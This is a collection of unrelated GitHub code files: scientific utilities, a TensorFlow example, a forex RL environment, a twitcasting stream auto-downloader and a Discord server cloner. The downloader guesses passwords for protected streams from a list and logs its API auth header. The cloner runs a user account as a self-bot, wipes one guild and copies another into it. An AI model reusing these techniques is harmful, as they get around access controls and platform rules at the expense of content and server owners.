{"seq_id":"73375379617","text":"import os.path\nimport yaml\n\npath = os.path.dirname(os.path.realpath(__file__)) + '/conversion_file/'\n\ndef load_ff(ff = 'charmm'):\n\tif ff == 'charmm':\n\t\twith open(f'{path}charmm2sybyl.yml') as c2s:\n\t\t\treturn yaml.load(c2s, Loader=yaml.FullLoader)\n\telif ff == 'amber':\n\t\twith open(f'{path}amber2sybyl.yml') as c2s:\n\t\t\treturn yaml.load(c2s, Loader=yaml.FullLoader)\n\telif ff is None:\n\t\treturn None\n\telse:\n\t\traise ValueError(f'Unrecognized forcefield {ff}')\n\ndef load_pdb_c(pdb_c):\n\t\tif pdb_c is not None:\n\t\t\twith open(pdb_c) as p:\n\t\t\t\treturn yaml.load(p, Loader=yaml.FullLoader)\n\t\telse:\n\t\t\treturn None\n\ndef get_path_files(folder):\n\t\tif os.path.isdir(folder):\n\n\t\t\tlist_file=[]\n\n\t\t\tfiles = os.listdir(folder)\n\n\t\t\tfor f in files:\n\t\t\t\tlist_file.append(f'{folder}/{f}')\n\t\t\treturn 
sorted(list_file)\n\n\t\telse:\n\t\t\treturn None\n\ndef print_progress (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\", refreshRate=0.01):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)\n # Print New Line on Complete\n if iteration == total: \n print()","repo_name":"LIT-CCM-lab/OCSVM-ADRB2","sub_path":"mol2_trajectory/mol2_trajectory/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"8643479074","text":"import asyncio\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nfrom datetime import datetime\nimport aiohttp\nimport requests\nfrom pathlib import Path\nfrom bs4 import BeautifulSoup\nfrom requests.adapters import HTTPAdapter\nimport const\nfrom log import create_logger\nimport base64\n\n\nCLIENT_ID = const.CLIENT_ID\nCLIENT_SECRET = const.CLIENT_SECRET\nACCESS_TOKEN = base64.b64encode(f\"{CLIENT_ID}:{CLIENT_SECRET}\".encode()).decode(\"utf-8\")\n\n\ndef check_file(live_date, live_title, live_id, streamer, output_path):\n file_name = f'{live_date} - {live_title} ({live_id}).mp4'\n try:\n if os.path.isfile(f'{output_path}\\\\{streamer}\\\\{file_name}'):\n live_date = f'{live_date}{str(time.strftime(\"%H%M%S\"))}'\n file_name = f'{live_date} - {live_title} ({live_id}).mp4'\n except Exception as e:\n logger.debug(e)\n finally:\n return file_name\n\n\ndef loading_text():\n loading_string = \"Waiting for live twitcasting streams \"\n animation = [\" \", \". \", \".. \", \"... \", \".... 
\", \".....\"]\n idx = 0\n while True:\n print(f\"[INFO] {datetime.now().replace(microsecond=0)} | \" + loading_string + animation[idx % len(animation)], end=\"\\r\")\n time.sleep(0.3)\n idx += 1\n if idx == 6:\n idx = 0\n\n\ndef format_url_message(user_id, live_id, live_message, live_url):\n live_message = live_message.replace(\"protected\", \"`protected`\").replace(\"member's only\", \"`member's only`\")\n if \"_\" in user_id[0] or \"_\" in user_id[-1] or \"__\" in user_id:\n live_message = live_message.replace(user_id, f\"`{user_id}`\")\n if \"__\" not in user_id:\n live_url = f\"`https://twitcasting.tv/{user_id}/movie/{live_id}`\"\n return live_message, live_url\n return live_message, live_url\n\n\ndef get_secondary_title(res):\n try:\n temp_live_title = res['movie']['title']\n temp_live_comment = res['movie']['last_owner_comment']\n temp_live_subtitle = res['movie']['subtitle']\n if temp_live_comment is not None and temp_live_title != temp_live_comment:\n return temp_live_comment.replace(\"\\\\n\", \"\\n\")\n elif temp_live_subtitle is not None and temp_live_title != temp_live_subtitle:\n return temp_live_subtitle.replace(\"\\\\n\", \"\\n\")\n else:\n return res['broadcaster']['screen_id']\n except KeyError as kError:\n logger.error(kError, exc_info=True)\n return temp_live_title\n\n\ndef get_passwords():\n try:\n if PASSWORD_PATH is None or PASSWORD_PATH == \"\":\n return None\n with open(PASSWORD_PATH, mode='r', encoding=\"utf-8\") as password_file:\n lines = password_file.readlines()\n passwords = {line.rstrip() for line in lines}\n return passwords\n except Exception as e:\n logger.error(e)\n logger.error(\"Error getting password list\")\n return None\n\n\n# This endpoint can catch membership streams but may rate limit after a while\nasync def fetch_html(session, user_id):\n headers = {'Accept': 'application/json'}\n url = f\"https://twitcasting.tv/streamserver.php?target={user_id}&mode=client\"\n res = await session.get(url, headers=headers)\n return res, user_id\n\n\nasync def get_lives():\n tasks = []\n live_streams = []\n rate_limit = False\n async with aiohttp.ClientSession() as session:\n for user_id in user_ids:\n tasks.append(fetch_html(session, user_id))\n results = await asyncio.gather(*tasks)\n for result in results:\n try:\n res = await result[0].json(content_type=None)\n except json.JSONDecodeError as jsonDecodeError:\n logger.debug(jsonDecodeError)\n logger.debug(result)\n logger.debug(f\"Error {result[0].status}: {result[0].reason}\")\n rate_limit = True\n res = {}\n await asyncio.sleep(1)\n except aiohttp.ClientError as clientError:\n logger.debug(clientError)\n logger.debug(result)\n logger.debug(f\"Error {result[0].status}: {result[0].reason}\")\n rate_limit = True\n res = {}\n await asyncio.sleep(1)\n id = result[1]\n if not res:\n res = {'error': True}\n\n live_streams.append((res, id))\n if rate_limit:\n # TODO maybe switch api instead\n time.sleep(5)\n return live_streams\n\n\n# Used to check the latest movie to see if it's live and/or is a member's only stream\ndef check_latest_live(user_id, session, logger):\n try:\n headers = {'Authorization': f'Basic {ACCESS_TOKEN}',\n 'Accept': 'application/json',\n 'X-Api-Version': '2.0'}\n response = session.get(f\"https://apiv2.twitcasting.tv/users/{user_id}/movies?limit=1\",\n headers=headers)\n if response.status_code == 401:\n logger.error(\"Error with tokens\")\n res = response.json()\n logger.debug(res)\n logger.debug(response.status_code)\n try:\n response = 
session.get(f\"https://apiv2.twitcasting.tv/users/{user_id}\", headers=headers).json()\n if response.status_code == 401:\n logger.error(\"Error with tokens\")\n user_res = response.json()\n # If the stream is live then it's a member's only live stream\n if len(res['movies']) != 0:\n res_data = {'movie': res['movies'][0], 'broadcaster': user_res['user']}\n logger.debug(res_data)\n return res_data\n else:\n return {}\n except TypeError:\n res_data = {'movie': data['movies'][0],\n 'broadcaster': {'screen_id': user_id, 'image': res['movies'][0]['large_thumbnail']}}\n return res_data\n\n except requests.exceptions.ConnectionError as cError:\n logger.debug(cError)\n return {}\n except (requests.exceptions.RequestException, json.decoder.JSONDecodeError) as rerror:\n logger.error(rerror)\n return {}\n except Exception as e:\n logger.debug(res)\n logger.debug(e)\n return {}\n\n\ndef poll_member_stream(user_id):\n membership_status = False\n member_data = {}\n try:\n page_res = requests.get(f\"https://twitcasting.tv/{user_id}/show/\").text\n soup = BeautifulSoup(page_res, \"html.parser\")\n first_video_element = soup.find(\"div\", class_=\"recorded-movie-box\").find(\"a\", class_=\"tw-movie-thumbnail\")\n # sometimes tw-movie-thumbnail-title-icon does not exist if grabbed too early but no issues as it can repoll\n # if is issue either give up or get tw-movie-thumbnail-image as a replacement but link can't be viewed probably\n member_icon_element = first_video_element.find(\"img\", class_=\"tw-movie-thumbnail-title-icon\")['src']\n membership_status = True if \"member\" in member_icon_element else False\n # If this endpoint returns False on is_on_live then it's likely a member only stream\n logger.debug(f\"{user_id} member stream: {membership_status}\")\n movie_title_element = first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-title\")\n if movie_title_element is not None:\n movie_title = movie_title_element.text.strip()\n else:\n movie_title = user_id\n movie_subtitle_element = first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-label\")\n if movie_subtitle_element is not None:\n movie_subtitle = first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-label\").text.lstrip().rstrip()\n else:\n movie_subtitle = movie_title\n is_protected = True if len(first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-title\")\n .find_all(\"img\", class_=\"tw-movie-thumbnail-title-icon\")) > 1 else False\n image = soup.find(\"a\", class_=\"tw-user-nav-icon\").find(\"img\", recursive=False)['src']\n thumbnail = soup.find(\"img\", class_=\"tw-movie-thumbnail-image\")['src']\n date = first_video_element.find(\"img\", class_=\"tw-movie-thumbnail-image\")['title'][:10].replace(\"/\", \"\")\n member_data = {'title': movie_title, 'subtitle': movie_subtitle, 'is_protected': is_protected, 'date': date,\n 'image': f'https:{image}', 'thumbnail': thumbnail}\n except KeyError as kError:\n logger.debug(page_res)\n logger.error(kError, exc_info=True)\n except AttributeError as aError:\n logger.debug(page_res)\n logger.error(aError, exc_info=True)\n except Exception as e:\n logger.debug(page_res)\n logger.error(e, exc_info=True)\n finally:\n return membership_status, member_data\n\n\ndef check_member_stream(user_id):\n headers = {'Accept': 'application/json'}\n url = f\"https://frontendapi.twitcasting.tv/users/{user_id}/latest-movie\"\n res = requests.get(url, headers=headers).json()\n try:\n # If this endpoint returns False on is_on_live then it's likely a member only stream\n if not 
res['movie']['is_on_live']:\n return True\n else:\n return False\n except KeyError as kError:\n # If this endpoint contains any empty movie dictionary then it's likely a member only stream\n logger.debug(kError)\n return True\n\n\ndef add_live_users(lives):\n for stream in lives:\n stream_json = stream[0]\n streamer_name = stream[1]\n try:\n if len(stream_json) != 0 and stream_json['movie']['live']:\n movie_id = stream_json['movie']['id']\n if movie_id != user_ids[streamer_name]['movie_id']:\n user_ids[streamer_name] = {\"movie_id\": movie_id,\n \"notified\": False,\n \"downloaded\": False,\n \"type\": \"Live\"}\n else:\n try:\n if user_ids[streamer_name][\"movie_id\"] is not None and 'error' not in stream_json:\n # logger.info(f\"{streamer_name} is now offline{' ' * 25}\\n\")\n logger.info(f\"{streamer_name} is now offline{' '*25}\")\n except Exception as e:\n logger.error(e)\n user_ids[streamer_name] = {\"movie_id\": None,\n \"notified\": False,\n \"downloaded\": False,\n \"type\": None}\n except Exception as e:\n logger.debug(e)\n continue\n\n\nif __name__ == \"__main__\":\n logger = create_logger()\n logger.info(\"Starting program\")\n\n # Setup\n SLEEP_TIME = const.SLEEP_TIME\n WEBHOOK_URL = const.WEBHOOK_URL\n\n try:\n PASSWORD_PATH = Path(const.PASSWORD_PATH).resolve()\n except Exception:\n logger.error(\"There is a problem with the password path\")\n\n logger.debug(f'Authorization: Basic {ACCESS_TOKEN}')\n\n COOKIES = []\n if const.COOKIES is not None:\n if '--cookies-from-browser' in const.COOKIES:\n COOKIES = const.COOKIES.split(maxsplit=1)\n else:\n COOKIES = ['--cookies', const.COOKIES]\n\n # Dictionary comprehension of the list of twitcasting users\n user_ids = {user_id: {\"movie_id\": None, \"notified\": False, \"downloaded\": False, \"type\": None} for user_id in\n const.user_ids}\n\n # Setup session\n session = requests.Session()\n session.mount(\"https://\", HTTPAdapter(max_retries=5))\n live_streams = set()\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n threading.Thread(target=loading_text).start()\n\n # Get output path and if it ends with backward slash then remove it\n if const.OUTPUT_PATH is not None or \"\":\n output_path = Path(const.OUTPUT_PATH).resolve()\n else:\n output_path = os.getcwd()\n while True:\n try:\n # logger.debug(user_ids)\n time.sleep(1)\n # logger.debug(\"Fetching Lives...\")\n # Check whether user is currently like\n try:\n lives = asyncio.run(get_lives())\n logger.debug(lives)\n except aiohttp.ServerDisconnectedError as server_error:\n logger.error(f\"{server_error}{' '*22}\")\n continue\n except aiohttp.ClientOSError as client_error:\n logger.error(f\"{client_error}{' '*20}\")\n except Exception as e:\n logger.error(e)\n continue\n add_live_users(lives)\n for user_id, user_data in user_ids.items():\n try:\n if user_data['movie_id'] is not None and not user_data['notified']:\n res = {}\n headers = {'Authorization': f'Basic {ACCESS_TOKEN}',\n 'Accept': 'application/json',\n 'X-Api-Version': '2.0'}\n response = session.get(f\"https://apiv2.twitcasting.tv/users/{user_id}/current_live\",\n headers=headers)\n if response.status_code == 401:\n logger.error(\"Error with tokens\")\n continue\n res = response.json()\n logger.debug(res)\n live_url = f\"https://twitcasting.tv/{user_id}/movie/{user_data['movie_id']}\"\n if 'movie_id' in res and res['movie_id'] is not None:\n # Check if it's a member's only stream\n is_member = check_member_stream(user_id)\n logger.debug(is_member)\n if is_member:\n res['member_only'] = True\n 
else:\n # logger.info(f\"{user_id} is currently offline...\")\n continue\n except requests.exceptions.ConnectionError as cError:\n logger.error(cError)\n except (requests.exceptions.RequestException, json.decoder.JSONDecodeError) as rerror:\n logger.error(rerror)\n continue\n # If res returns a json with an error key then it is not currently live\n if 'error' in res and res['error']['code'] == 404:\n error_res = res\n res = check_latest_live(user_id, session, logger)\n if res == {}:\n member_res, data = poll_member_stream(user_id)\n # maybe also checking member_res is not necessary\n if member_res and user_ids[user_id][\"type\"] == \"Live\":\n # For now use live thumbnail instead of pfp\n try:\n res = {'movie': {'id': user_ids[user_id]['movie_id'], 'title': data['title'],\n 'subtitle': data['subtitle'],\n 'last_owner_comment': None, 'is_protected': data['is_protected'],\n 'date': data['date'],\n 'member_thumbnail': data['thumbnail']},\n 'broadcaster': {'screen_id': user_id,\n 'image': data['image']},\n 'member_only': True}\n logger.debug(res)\n except Exception as e:\n logger.error(e, exc_info=True)\n else:\n continue\n else:\n res['member_only'] = True\n res['movie']['member_thumbnail'] = res['movie']['small_thumbnail']\n # If the request could not be sent due to an invalid bearer token\n if error_res['error']['code'] == 1000:\n logger.error(\"Invalid bearer token\")\n quit()\n # TODO set default values in event not found\n try:\n member_only = res['member_only'] if 'member_only' in res else False\n protected = res['movie']['is_protected'] if 'is_protected' in res['movie'] else False\n live_id = res['movie']['id']\n screen_id = res['broadcaster']['screen_id']\n user_image = res['broadcaster']['image']\n live_title = res['movie']['title']\n live_comment = get_secondary_title(res)\n if 'member_thumbnail' not in res['movie']:\n if 'large_thumbnail' in res['movie']:\n live_thumbnail = res['movie']['large_thumbnail']\n else:\n live_thumbnail = f\"https://apiv2.twitcasting.tv/users/{user_id}/live/thumbnail?size=large&position=latest\"\n else:\n live_thumbnail = res['movie']['member_thumbnail']\n if 'created' in res['movie']:\n live_date = datetime.fromtimestamp(res['movie']['created']).strftime('%Y%m%d')\n else:\n live_date = res['movie']['date']\n if \"_\" not in screen_id[0] or \"_\" not in screen_id[-1]:\n live_url = f\"https://twitcasting.tv/{screen_id}/movie/{live_id}\"\n else:\n live_url = f\"`https://twitcasting.tv/{screen_id}/movie/{live_id}`\"\n download_url = f\"https://twitcasting.tv/{screen_id}/movie/{live_id}\"\n except KeyError as kError:\n logger.error(kError, exc_info=True)\n # If a live stream has been encountered for the first time\n if not user_data['notified']:\n # Send notification to discord webhook\n if WEBHOOK_URL is not None:\n if protected and member_only:\n live_text = f\"{screen_id} has a protected member's only live stream at \"\n elif protected:\n live_text = f\"{screen_id} has a protected live stream at \"\n elif member_only:\n live_text = f\"{screen_id} has a member's only live stream at \"\n else:\n live_text = f\"{screen_id} is now live at \"\n # print(\" \" * 70, end='\\n')\n logger.info(live_text + download_url)\n live_text, live_url = format_url_message(screen_id, live_id, live_text, live_url)\n message = {\"embeds\": [{\n \"color\": 13714,\n \"author\": {\n \"name\": screen_id,\n \"icon_url\": user_image\n },\n \"fields\": [\n {\n \"name\": f\"{live_title}\\n{live_comment}\\n\\n{live_text}\",\n \"value\": live_url\n }\n ],\n \"image\": {\n \"url\": 
live_thumbnail\n },\n \"thumbnail\": {\n \"url\": user_image\n }\n }]\n }\n requests.post(WEBHOOK_URL, json=message)\n user_data['notified'] = True\n\n if not user_data['downloaded']:\n # Get password list\n passwords = None\n if protected:\n passwords = get_passwords()\n passwords.add(datetime.utcnow().strftime(\"%Y%m%d\"))\n\n # Download the live stream\n # logger.info(f\"Downloading {download_url}\\n\")\n logger.info(f\"Downloading {download_url}\")\n file_name = check_file(live_date, live_title, live_id, screen_id, output_path)\n output = f'{output_path}/{screen_id}/{file_name}'\n logger.debug(f\"Download Path: {output}\")\n if not protected and not member_only:\n yt_dlp_args = ['start', f'auto-twitcasting {screen_id} {live_id}', '/min', 'cmd', '/c',\n 'yt-dlp', *COOKIES, '--no-part', '--embed-metadata', '-N', '4']\n yt_dlp_args += ['-o', output, download_url]\n # TODO: get output from result so I can log it\n result = subprocess.run(yt_dlp_args, shell=True)\n elif protected and passwords is not None:\n # Try downloading protected streams by trying all the passwords\n # If stream happens to also be a password protected member's only stream this should work too\n # This will open up a console for each password so make sure the password list isn't too long...\n for password in passwords:\n # Scenario where cookies unlock the video but video-password is still called so error or not\n yt_dlp_args = ['start', f'auto-twitcasting {screen_id} {live_id}', '/min', 'cmd', '/c',\n 'yt-dlp', *COOKIES, '--no-part', '--embed-metadata']\n yt_dlp_args += ['--video-password', password, '-o', output, download_url]\n result = subprocess.run(yt_dlp_args, shell=True)\n # TODO pass check and if output by making another call checking -F and does not contain \"ERROR:\" then break out\n # time.sleep(1)\n elif member_only:\n yt_dlp_args = ['start', f'auto-twitcasting {screen_id} {live_id}', '/min', 'cmd', '/c',\n 'yt-dlp', *COOKIES, '--no-part']\n yt_dlp_args += ['--embed-metadata', '-o', output, download_url]\n result = subprocess.run(yt_dlp_args, shell=True)\n else:\n logger.error(f\"Failed to download protected stream at {download_url}\")\n user_data['downloaded'] = True\n except Exception as e:\n logger.error(e, exc_info=True)\n","repo_name":"Spicadox/auto-twitcasting","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":22844,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"28170452782","text":"#!/usr/bin/env python3\n\n# Create a matrix listing where every driver was built.\n#\n# The resulting json object looks something like this:\n# {\n# \"3.10.0-123.1.2.el7.x86_64\": {\n# \"2.2.0\": {\n# \"ebpf\": \"unavailable\",\n# \"kmod\": \"upstream\"\n# },\n# \"2.3.0\": {\n# \"ebpf\": \"unavailable\",\n# \"kmod\": \"upstream\"\n# },\n# \"2.4.0\": {\n# \"ebpf\": \"unavailable\",\n# \"kmod\": \"upstream\"\n# },\n# \"2.5.0\": {\n# \"ebpf\": \"unavailable\"\n# }\n# },\n# \"4.18.0-80.el8.x86_64\": {\n# \"2.2.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# },\n# \"2.3.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# },\n# \"2.4.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# },\n# \"2.5.0\": {\n# \"ebpf\": \"upstream\"\n# }\n# },\n# ...\n# }\n#\n# If you are interested on finding a specific kernel, you can use jq with a\n# filter similar to the following:\n# jq '.\"6.2.8-300.fc38.x86_64\"' driver-matrix.json\n# {\n# \"2.4.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# 
},\n# \"2.5.0\": {\n# \"ebpf\": \"upstream\"\n# }\n# }\n\nimport argparse\nimport json\nimport os\nimport sys\nimport re\n\nkernel_version_re = re.compile(r'(\\d+\\.\\d+\\.\\d+.*)\\.(o|ko)\\.gz$')\nunavailable_re = re.compile(r'\\.collector-ebpf-(\\d+\\.\\d+\\.\\d+.*)\\.unavail$')\n\n\ndef update_kernel(kernel_list: dict,\n kernel_version: str,\n driver_version: str,\n driver_type: str,\n source: str):\n kernel = kernel_list.get(kernel_version)\n if kernel is None:\n kernel_list[kernel_version] = {\n driver_version: {\n driver_type: source,\n }\n }\n else:\n dver = kernel.get(driver_version)\n if dver is None:\n kernel[driver_version] = {\n driver_type: source,\n }\n else:\n dver[driver_type] = source\n\n\ndef process_line(kernels: dict,\n source: str,\n line: str):\n driver_path, driver = os.path.split(line)\n _, driver_version = os.path.split(driver_path)\n\n match = kernel_version_re.search(driver)\n if match:\n kernel_version = match[1]\n driver_type = 'kmod' if match[2] == 'ko' else 'ebpf'\n update_kernel(kernels, kernel_version,\n driver_version, driver_type, source)\n return\n\n match = unavailable_re.search(driver)\n if match:\n kernel_version = match[1]\n update_kernel(kernels, kernel_version,\n driver_version, 'ebpf', 'unavailable')\n return\n\n print('Did not match any known drivers')\n\n\ndef main(file: str, source: str):\n kernels = {}\n\n if file is None:\n file = sys.stdout\n else:\n if os.path.isfile(file):\n with open(file, 'r') as f:\n kernels = json.load(f)\n\n file = open(file, \"w\")\n\n for line in sys.stdin:\n process_line(kernels, source, line.rstrip())\n\n json.dump(kernels, file)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--update', help='File to be updated')\n parser.add_argument('-d', '--downstream', action='store_true',\n help='Mark available drivers as \"downstream\"')\n args = parser.parse_args()\n\n source = 'downstream' if args.downstream else 'upstream'\n file = args.update\n\n main(file, source)\n","repo_name":"stackrox/collector","sub_path":".github/actions/support-package-driver-matrix/driver-matrix.py","file_name":"driver-matrix.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"34"} +{"seq_id":"1366106531","text":"from os import system\r\nimport psutil\r\nfrom pypresence import Presence\r\nimport time\r\nimport sys\r\nstart_time=time.time()\r\nimport discord\r\nimport asyncio\r\nimport colorama\r\nfrom colorama import Fore, init, Style\r\nimport platform\r\nfrom serverclone import Clone\r\n\r\nclient = discord.Client()\r\nos = platform.system()\r\nif os == \"Windows\":\r\n system(\"cls\")\r\nelse:\r\n system(\"clear\")\r\n print(chr(27) + \"[2J\")\r\nprint(f\"\"\"{Fore.RED}\r\n\r\n\r\n█ █▀ ▄█ ▄ ▄▀ ▄▄▄▄▄ ▄▄▄▄▄ ▄███▄ █▄▄▄▄ ▄ ▄███▄ █▄▄▄▄ ▄█▄ █ ████▄ ▄ ▄███▄ █▄▄▄▄ \r\n█▄█ ██ █ ▄▀ █ ▀▄ █ ▀▄ █▀ ▀ █ ▄▀ █ █▀ ▀ █ ▄▀ █▀ ▀▄ █ █ █ █ █▀ ▀ █ ▄▀ \r\n█▀▄ ██ ██ █ █ ▀▄ ▄ ▀▀▀▀▄ ▄ ▀▀▀▀▄ ██▄▄ █▀▀▌ █ █ ██▄▄ █▀▀▌ █ ▀ █ █ █ ██ █ ██▄▄ █▀▀▌ \r\n█ █ ▐█ █ █ █ █ █ ▀▄▄▄▄▀ ▀▄▄▄▄▀ █▄ ▄▀ █ █ █ █ █▄ ▄▀ █ █ █▄ ▄▀ ███▄ ▀████ █ █ █ █▄ ▄▀ █ █ \r\n █ ▐ █ █ █ ███ ▀███▀ █ █ █ ▀███▀ █ ▀███▀ ▀ █ █ █ ▀███▀ █ \r\n ▀ █ ██ ▀ █▐ ▀ █ ██ ▀ \r\n ▐ \r\n{Style.RESET_ALL}\r\n {Fore.MAGENTA}Developed by: TEAM IC.{Style.RESET_ALL}\r\n \"\"\")\r\ntoken = input(f'Please enter your token:\\n >')\r\nguild_s = input('Please enter guild id you want to copy:\\n >')\r\nguild = input('Please enter guild id where you want to copy:\\n >')\r\ninput_guild_id = guild_s # <-- 
input guild id\r\noutput_guild_id = guild # <-- output guild id\r\ntoken = token # <-- your Account token\r\n\r\n\r\nprint(\" \")\r\nprint(\" \")\r\n\r\n@client.event\r\nasync def on_ready():\r\n extrem_map = {}\r\n print(f\"Logged In as : {client.user}\")\r\n print(\"Cloning Server\")\r\n guild_from = client.get_guild(int(input_guild_id))\r\n guild_to = client.get_guild(int(output_guild_id))\r\n await Clone.guild_edit(guild_to, guild_from)\r\n await Clone.roles_delete(guild_to)\r\n await Clone.channels_delete(guild_to)\r\n await Clone.roles_create(guild_to, guild_from)\r\n await Clone.categories_create(guild_to, guild_from)\r\n await Clone.channels_create(guild_to, guild_from)\r\n print(f\"\"\"{Fore.GREEN}\r\n\r\n\r\n██▄ ████▄ ▄ ▄███▄ \r\n█ █ █ █ █ █▀ ▀ \r\n█ █ █ █ ██ █ ██▄▄ \r\n█ █ ▀████ █ █ █ █▄ ▄▀ \r\n███▀ █ █ █ ▀███▀ \r\n █ ██ \r\n\r\n {Style.RESET_ALL}\"\"\")\r\n await asyncio.sleep(5)\r\n client.close()\r\n\r\n\r\nclient.run(token, bot=False)\r\n","repo_name":"NFTCOWS/Discord-Server-Cloner-With-Perms-and-Hidden-Channels","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16283245984","text":"import numpy as np\nimport tensorflow as tf\nBATCH_SIZE=8\nseed=23455\n\n#基于seed产生随机数\nrng=np.random.RandomState(seed)\n#随机生成32行2列的矩阵\nX=rng.rand(32,2)\n#行的和小于1,赋值1; 大于等于1,赋值0\nY=[[int(x0+x1<1)] for (x0,x1) in X]\nprint(X)\nprint(Y)\n\n#定义数据集的输入\nx=tf.placeholder(tf.float32,shape=(None,2))\ny_=tf.placeholder(tf.float32,shape=(None,1))\n\n#定义参数\nw1=tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))\nw2=tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))\n\n\n#定义前向传播过程\na=tf.matmul(x,w1)\ny=tf.matmul(a,w2)\n\n#定义损失函数\nloss=tf.reduce_mean(tf.square(y-y_))\n#定义反向传播算法\ntrain_step=tf.train.GradientDescentOptimizer(0.001).minimize(loss)\n\n#生成会话\nsess=tf.Session()\ninit_op=tf.global_variables_initializer()\nsess.run(init_op)\n\n##输出训练前,w1,w2的取值\nprint(sess.run(w1))\nprint(sess.run(w2))\n\n##训练模型\n\nSTEPS=3000\nfor i in range(STEPS):\n start=(i*BATCH_SIZE)%32\n end=start+BATCH_SIZE\n sess.run(train_step,feed_dict={x:X[start:end], y_:Y[start:end]})\n if i%500==0:\n total_loss=sess.run(loss,feed_dict={x:X, y_:Y})\n print(\"After %d traing steps,loss on all data is %g\"%(i,total_loss))\n\n##输出训练后,w1,w2的取值\nprint(sess.run(w1))\nprint(sess.run(w2))\n\n","repo_name":"QIANXUDECC/mnist_tensorflow","sub_path":"backforward.py","file_name":"backforward.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10736248052","text":"#this defines the trading MDP\nfrom data_preprocessing import Data\nfrom agent import Agent\nimport numpy as np\nfrom copy import deepcopy\nfrom common import hot_encoding, save_data_structure, DIRECTORY\n\n# state here means a sequence of Data's states of length T\n# steps are done T days ahead\nclass TradingEnv:\n def __init__(self, data: Data, initial_value=100000):\n self.initial_value = initial_value\n self.portfolio = [float(initial_value)]\n self.actions = []\n self.prev_close = None\n self.data = data\n self.spread = 0.08\n self.trade_size = 100000\n\n def merge_state_action(self, state, a_variable):\n T = len(state)\n actions_for_state = self.actions[self.data.n:][:T-1] # TODO: Check indices\n actions_for_state.append(a_variable)\n # TODO: Is there a better way\n diff = T - len(actions_for_state)\n if diff > 0:\n 
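# Note (added): pad the tail of the window with the candidate action so every\n # one of the T timesteps carries an action column; e.g. with T=5 and three\n # recorded actions the padded list reads [a0, a1, a2, a_variable, a_variable].\n 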
actions_for_state.extend([a_variable] * diff)\n\n result = []\n for s, a in zip(state, actions_for_state):\n new_s = deepcopy(s)\n new_s.extend(hot_encoding(a))\n result.append(new_s)\n\n result = np.asarray(result)\n return result\n\n # Returns: state\n def reset(self) -> object:\n self.portfolio = [float(self.initial_value)]\n self.data.reset()\n self.actions.append(0) # TODO: Check if this correct\n closing, state_initial = self.data.next()\n self.prev_close = closing\n return self.merge_state_action(state_initial, 0)\n\n # Returns: actions, rewards, new_states, selected new_state, done\n def step(self, action) -> object: # TODO: check if everything is correct esp. with the action values and array indexing\n actions = [-1, 0, 1]\n v_old = self.portfolio[-1]\n\n try:\n closing, state_next = self.data.next()\n done = False\n except:\n state_next = None\n done = True\n\n new_states = []\n for a in actions:\n new_states.append(self.merge_state_action(state_next, a))\n\n current_closed = closing\n if self.prev_close is not None:\n current_open = self.prev_close\n self.prev_close = current_closed\n else:\n raise Exception(\"No previous close price saved!\")\n\n v_new = []\n for a in actions:\n commission = self.trade_size * np.abs(a - self.actions[-1]) * self.spread\n v_new.append(v_old + a * self.trade_size * (current_closed - current_open) - commission)\n\n v_new = np.asarray(v_new)\n rewards = np.log(v_new/v_old)\n\n self.actions.append(int(action))\n self.portfolio.append(float(v_new[action+1]))\n\n return actions, rewards, new_states, new_states[action+1], done\n\n def print_stats(self):\n # draw portfolio and actions against price curve\n s = np.random.randint(0, 1000)\n save_data_structure(self.actions, DIRECTORY + \"actions%s.json\" % s )\n save_data_structure(self.portfolio, DIRECTORY + \"portfolio%s.json\" % s)\n\n\nclass RunAgent:\n def __init__(self, env: TradingEnv, agent: Agent):\n self.env = env\n self.agent = agent\n\n def run(self, episodes):\n self.agent.initialize()\n\n state = self.env.reset() # initial_state\n\n for step in range(episodes):\n action = self.agent.get_action(state) # select greedy action, exploration is done in step-method\n\n actions, rewards, new_states, state, done = self.env.step(action)\n\n if done:\n break\n\n self.agent.store(state, actions, rewards, new_states)\n\n if self.agent.is_memory_filled() and step % self.agent.network.T == 0: # TODO: Check if this is the right T\n self.agent.train(update=True)\n\n self.env.print_stats()","repo_name":"StephanH84/algo-trading","sub_path":"forex/src/trading_env.py","file_name":"trading_env.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} 